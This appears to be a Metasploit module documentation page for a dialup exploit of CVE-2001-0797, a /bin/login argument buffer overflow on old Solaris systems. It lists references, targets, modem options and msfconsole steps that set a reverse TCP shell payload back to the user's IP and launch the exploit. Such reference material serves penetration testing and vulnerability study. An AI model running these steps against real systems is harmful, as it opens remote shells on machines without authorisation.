System V Derived /bin/login Extraneous Arguments Buffer Overflow
This exploit connects to a system's modem over dialup and exploits a buffer overflow vulnerability in its System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments.
Exploit Rank
- Good
Exploit Authors
- I)ruid <druid [at] caughq.org>
Vulnerability References
- CVE-2001-0797
- OSVDB-690
- OSVDB-691
- BID-3681
- http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html
- http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html
Exploit Targets
- 0 - Solaris 2.6 - 8 (SPARC) (default)
Exploit Usage Information
$ msfconsole
msf > use exploit/dialup/multi/login/manyargs
msf exploit(manyargs) > show payloads
msf exploit(manyargs) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(manyargs) > set LHOST [MY IP ADDRESS]
msf exploit(manyargs) > set NUMBER [STRING]
msf exploit(manyargs) > exploit
Exploit Module Options
| Option | Description |
|---|---|
| BAUDRATE | Baud Rate (default: 19200) |
| DATABITS | Data Bits (4 is Windows Only) (accepted: 4, 5, 6, 7, 8) (default: 8) |
| DIALPREFIX | Dial Prefix (default: ATDT *67, *70,) |
| DIALSUFFIX | Dial Suffix |
| DIALTIMEOUT | Dial Timeout in seconds (default: 60) |
| DISPLAYMODEM | Displays modem commands and responses on the console |
| FLOWCONTROL | Flow Control (accepted: None, Hardware, Software, Both) (default: None) |
| INITSTRING | Initialization String (default: AT X6 S11=80) |
| NUMBER | Number to Dial (e.g. 1.800.950.9955, (202) 358-1234, 358.1234 etc.) |
| PARITY | Parity (Mark & Space are Windows Only) (accepted: None, Even, Odd, Mark, Space) (default: None) |
| SERIALPORT | Serial Port (e.g. 0 (COM1), 1 (COM2), /dev/ttyS0, etc.) (default: /dev/ttyS0) |
| STOPBITS | Stop Bits (accepted: 1, 2) (default: 1) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
